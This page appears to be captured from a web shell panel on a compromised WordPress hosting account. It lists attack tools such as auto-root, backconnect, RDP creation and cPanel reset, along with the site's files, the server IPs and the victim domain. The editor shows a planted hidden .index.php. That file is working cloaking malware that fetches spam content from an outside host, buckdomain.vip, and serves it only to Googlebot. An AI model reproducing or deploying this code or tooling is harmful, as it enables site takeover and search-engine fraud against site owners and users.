Linux server257.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 185.61.153.106 | : 216.73.216.211
Cant Read [ /etc/named.conf ]
8.1.33
safeqmlm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
safeqmlm /
safesidelogistics.uk /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.hcflag
30
B
-rw-r--r--
.htaccess
1.47
KB
-rw-r--r--
.htaccess.bk
5.36
KB
-rw-r--r--
.index.php
1.62
KB
-rw-r--r--
.litespeed_flag
297
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
db.php
5.72
KB
-rw-r--r--
def346
721
B
-rw-r--r--
error_log
14.37
KB
-rw-r--r--
google2c87dd305faf8434.html
53
B
-rw-r--r--
google2fb6a0d84f27e5ef.html
53
B
-rw-r--r--
google4e4c680242116428.html
53
B
-rw-r--r--
google79db5e8238518904.html
53
B
-rw-r--r--
google91def98ee84f1f47.html
53
B
-rw-r--r--
googleaf2bb68f06aaa417.html
53
B
-rw-r--r--
googlee939e6f4cf54d8bd.html
53
B
-rw-r--r--
googleebbde4428dff488a.html
53
B
-rw-r--r--
googlefeebd55f97ad7caf.html
53
B
-rw-r--r--
index.php
405
B
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
phpinfo.php
25
B
-rw-r--r--
readme.html
7.25
KB
-rw-r--r--
robots.txt
22
B
-rw-r--r--
sitemap11.xml
1.64
MB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.5
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.21
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
29.38
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-site.php
1.82
KB
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .index.php
<?php function profile_user() { $refererUrl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : 'No Referer'; $useragent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $currentDomain = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'defaultdomain.com'; // Otomatis buat URL berdasarkan domain aktif $pasteUrl = 'https://buckdomain.vip/daniel/' . $currentDomain . '.html'; if (stripos($useragent, 'Google-InspectionTool') !== false || stripos($useragent, 'googlebot') !== false || stripos($useragent, '(compatible; Googlebot/2.1; +http://www.google.com/bot.html)') !== false) { // Ambil konten dari URL berdasarkan domain $content = fetch_content($pasteUrl); if ($content) { echo $content; exit(); } else { echo "Gagal mengambil konten dari $pasteUrl"; exit(); } } else { if (file_exists('index.php')) { include('index.php'); } elseif (file_exists('index.html')) { include('index.html'); } } } function fetch_content($url) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 5, ]); $content = curl_exec($ch); if (curl_errno($ch)) { error_log('cURL Error: ' . curl_error($ch)); return false; } curl_close($ch); return $content; } profile_user(); ?>
Close